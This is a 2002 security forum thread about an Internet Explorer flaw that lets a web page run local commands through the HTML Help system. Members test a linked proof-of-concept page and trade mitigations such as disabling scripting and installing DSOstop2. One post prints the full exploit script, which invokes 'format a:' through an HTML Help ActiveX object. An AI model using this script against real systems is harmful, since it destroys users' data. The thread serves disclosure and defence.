Internet Explorer: serious flaw

Discussion in 'other security issues & news' started by Paul Wilders, Nov 10, 2002.

Thread Status:
Not open for further replies.
  1. Paul Wilders

    Paul Wilders Administrator

    Joined:
    Jul 1, 2001
    Posts:
    12,472
    Location:
    The Netherlands
    wwx.dino-soft.org/auto.html

    note: prefix altered in "wwx". Needs to be reversed into "www" to make the URL work - Forum Admin

    The above url when viewed WILL FORMAT THE A:\ drive when viewed on a fully updated and patched windows system. If you go there make sure there is nothing in the A:\ that formating will harm; because this has been tested
    and works on Windows 2000 WinXP/home/corp/pro Win98/SE.

    This is a harmless POC to give you experts here a heads up; because Microsoft HAS been informed of the hole; but they seem to be sitting on there hands maybe much like the recent XP hole that they knew about before XP even shipped; but chose to wait until SP1 to correct.

    This is VERY DANGEROUS, and this little harmless POC could quite easy be made to be quite nasty; but when the author of the original hole who's hole I have sort of legoised and made to work a very little bit differently Microsoft had this to say to the original author:

    "Microsoft was initially contacted 2002-10-04. After several mail exchanges, their final response were that the technique used to run programs with parameters from the "Local computer zone" was no security vulnerability. A
    fix should instead be applied for all possibilities for content in the "Internet zone" to access the "Local computer zone".

    quoted from elsewhere - Forum Admin
     
  2. JacK

    JacK Registered Member

    Joined:
    Jun 20, 2002
    Posts:
    737
    Location:
    Belgium -Li?ge
    Hi Paul,

    Running WinXP Pro SP1 and tried the address : no harm done
    Just parameter non valid in a command box and the Hlp of IE open
    + on the Web page Testing IE Execute Exploit

    Nothing format with a disk in A:\

    Seems related with the flaw M$ Q323255 about Help (patch 021002)

    Rgds,
     
  3. LowWaterMark

    LowWaterMark Administrator

    Joined:
    Aug 10, 2002
    Posts:
    17,874
    Location:
    New England
    I'm not sure I understand the quoted Microsoft response. I looked at that site and it simply depends upon JavaScript, which I for one have disabled in the Internet Zone in IE. What I don't understand is the reference they make to the "local computer zone" (wasn't that the previous name for what is now called the "My Computer" zone?), I don't see how this relates to any other zone than the Internet Zone.

    This flaw gives people all the more reason to tighten up their security settings in IE (which is what I've done) or use another browser. I went to that site and nothing happened. Having scripting, ActiveX and Java disabled by default in the IE Internet Zone and then adding a list of trusted sites to the Trusted Zone and using something like IE-SpyAd for the Restricted Zone seems to address this type of POC exploit.

    Maybe I'm missing something.
     
  4. snapdragin

    snapdragin Administrator

    Joined:
    Feb 16, 2002
    Posts:
    8,415
    Location:
    Southern Ont., Canada
    Paul, forgive me but i do not understand what this is saying.

    And...is this a vulnerability just with Internet Explorer, or the entire Operating System? Would just using another browser be the only patch we could use until Microsoft comes out with one...or is XP still vulnerable for this no matter what browser is used? :doubt:

    (darn it is getting harder to understand all these new exploits out there)

    thank you!
    snap
     
  5. snapdragin

    snapdragin Administrator

    Joined:
    Feb 16, 2002
    Posts:
    8,415
    Location:
    Southern Ont., Canada
    LowWaterMark - i didn't see your post before i posted mine.....i am SO glad i am not the only one that didn't understand the references to the "zone's". Well at least i am in good company!! :D

    and feeling a li'l zoned-out with Microsoft right now! LOL!

    snap
     
  6. Pieter_Arntz

    Pieter_Arntz Spyware Veteran

    Joined:
    Apr 27, 2002
    Posts:
    13,330
    Location:
    Netherlands
    Same here plus an error in Adshield.

    Regards,

    Pieter
     
  7. Paul Wilders

    Paul Wilders Administrator

    Joined:
    Jul 1, 2001
    Posts:
    12,472
    Location:
    The Netherlands
    IMHO: that's the trick.

    snap,

    Read LowWaterMark's reply ;)

    regards.

    paul
     
  8. Paul Wilders

    Paul Wilders Administrator

    Joined:
    Jul 1, 2001
    Posts:
    12,472
    Location:
    The Netherlands
    Apologies - I'm hijacking a thread elsewhere now :rolleyes::

    "This requires Active Scripting turned on to run:

    <script LANGUAGE="JavaScript">

    prog = 'command';
    args = '/k format a: /autotest';

    if (!location.hash) {
    showHelp(location+"#1");
    showHelp("iexplore.chm");
    blur();
    }
    else if (location.hash == "#1")
    open(location+"2").blur();
    else {
    f = opener.location.assign;
    opener.location="res:";
    f("javascript:location.replace('mk:mad:MSITStore:C:')");
    setTimeout('run()',1000);
    }
    function run() {
    f("javascript:document.write('<object id=c1 classid=clsid:adb"+
    "880a6-d8ff-11cf-9377-00aa003b7a11><param name=Command value"+
    "=ShortCut><param name=Item1 value=\","+prog+","+args+"\"></"+
    "object><object id=c2 classid=clsid:adb880a6-d8ff-11cf-9377"+
    "-00aa003b7a11><param name=Command value=Close></object>')");
    f("javascript:c1.Click();c2.Click();c3.Click();");
    close();
    }
    </script>"

    regards,

    paul
     
  9. root

    root Registered Member

    Joined:
    Feb 19, 2002
    Posts:
    1,723
    Location:
    Missouri, USA
    I can see how the average user could get nailed with something like that, but I have that stopped several ways.
    Doesn't affect Opera, my firewall stops it, I have JS disabled, and probably have other protection against that happening.
    Scary thing is, obviously it works on some IE users. What if that were C instead of A? I wonder.
     
  10. Paul Wilders

    Paul Wilders Administrator

    Joined:
    Jul 1, 2001
    Posts:
    12,472
    Location:
    The Netherlands
    It most probably will work on - estimated guess - 90% from IE users, since not that many are pc/security savvy. Indeed: what if.. :rolleyes:.

    regards.

    paul
     
  11. LowWaterMark

    LowWaterMark Administrator

    Joined:
    Aug 10, 2002
    Posts:
    17,874
    Location:
    New England
    I'd have to guess that the "local computer zone" (aka. My Computer Zone) security settings come into play when IE Help is opened (or thru the link beginning with "res:", which is local PC, as well) and then the script tries to pass the necessary format command and parameters over to that window to be run...

    The key then is to not let such a site run any javascript in the first place, which is what exposes the actual zone relate flaw to exploitation.

    Yeah, I still stand by the concept of hardening your IE zones and populating the sites lists appropriately to protect against this and future unknown exploits.
     
  12. javacool

    javacool BrightFort Moderator

    Joined:
    Feb 10, 2002
    Posts:
    3,997
    I also get an error with Adshield...HOWEVER it worked ONCE on my Windows XP system with ActiveScripting, etc enabled (trying it again, I still get an error and the rest described above).

    Good ol' Proxo - I just wrote a little rule for this just in case. ;)

    -Javacool
     
  13. Bethrezen

    Bethrezen Registered Member

    Joined:
    Apr 16, 2002
    Posts:
    546
    hi

    what is that exploit ment to do coz I'm trying to find out if i am vulnerable or not

    when i ran it i got

    an adshield error a ie box saying something like testing exploit and the help box opened

    is this what it is ment to do ?
     
  14. LowWaterMark

    LowWaterMark Administrator

    Joined:
    Aug 10, 2002
    Posts:
    17,874
    Location:
    New England
    Bethrezen,

    It sounds like you got what Jack and Javacool got and it did not do what it was supposed to do, which was format a floppy in the A:\ drive. Edit: Opps, and Pieter, as well.
     
  15. Pieter_Arntz

    Pieter_Arntz Spyware Veteran

    Joined:
    Apr 27, 2002
    Posts:
    13,330
    Location:
    Netherlands
    Hmmmz. :agonizing pain in the area my brain should be:

    I just set my ActiveX and Java to "Ask" and got exactly the same results; no questions asked.
    I´m gonna ponder on that with one ear on a pillow after I reset everything to "Disable"

    Regards,

    Pieter
     
  16. Bethrezen

    Bethrezen Registered Member

    Joined:
    Apr 16, 2002
    Posts:
    546
    hi

    so the question is am i vulnerable to this type of thing ?? humm i wonder ?!?!?!?!?!

    dam microsoft

    [edit]

    a lil bit hard to post more info on what i mean as i don't really understand the vulnerability and what its ment to do

    but in a nut shell i ment i wonder if I'm vulnerable to this vulnerability and any other vulnerability that works in a similar fashion to this one
     
  17. Paul Wilders

    Paul Wilders Administrator

    Joined:
    Jul 1, 2001
    Posts:
    12,472
    Location:
    The Netherlands
    In case you'll set active scripting to "prompt" in the scripting section, you will be safe.

    regards.

    paul
     
  18. JacK

    JacK Registered Member

    Joined:
    Jun 20, 2002
    Posts:
    737
    Location:
    Belgium -Li?ge
    Hello,

    Seems to me dsostop2.exe should prevent this flaw, preventing running in local zone :)

    Rgds,
     
  19. Paul Wilders

    Paul Wilders Administrator

    Joined:
    Jul 1, 2001
    Posts:
    12,472
    Location:
    The Netherlands
    JacK,

    That seems just another solution ;). For those interested, here's the link for this nifty small freeware app:

    www.nsclean.com/dsostop.html

    A copy can be grabbed from our downloads page as well.

    regards.

    paul
     
  20. Vietnam Vet

    Vietnam Vet Registered Member

    Joined:
    Feb 9, 2002
    Posts:
    306
    Concerning apps like dsostop2, htastop, or socklock: do these need to be reapplied after an upgrade such as IE6.0SP1, or is it a once is enough kind of deal? Also, has anything been repaired :rolleyes:, so that these are unneeded or possible harmful if reapplied?
     
  21. FanJ

    FanJ Guest

    Hi Vietnam-vet,

    As far as DSOstop2 and SockLock are concerned (I don't know about HTAstop cause I use IEClean and don't need HTAstop) and as far as I know: you can always click on them and then they will let you know whether they still are enabled and protecting you.

    As for being harmful: I'm sure that Kevin would have let us all know (on a forum or on his site) about that!
    And you could always ask in the special PSC-forum at Becky's!
     
  22. Vietnam Vet

    Vietnam Vet Registered Member

    Joined:
    Feb 9, 2002
    Posts:
    306
    Hey FanJ, Thanks for reminding me to turn my brain back on :rolleyes: Seriously, I just reclicked all three,(only dsostop2 told me I was already protected), but since I would agree about Kevin warning about any danger, I think everything is fine. Thanks for the advice!
     
  23. Pieter_Arntz

    Pieter_Arntz Spyware Veteran

    Joined:
    Apr 27, 2002
    Posts:
    13,330
    Location:
    Netherlands
    I just learned that the error in the command prompt we got was caused by the /autotest parameter. This one is unknown in Windows NT/2k/XP

    Regards,

    Pieter
     
Loading...
Thread Status:
Not open for further replies.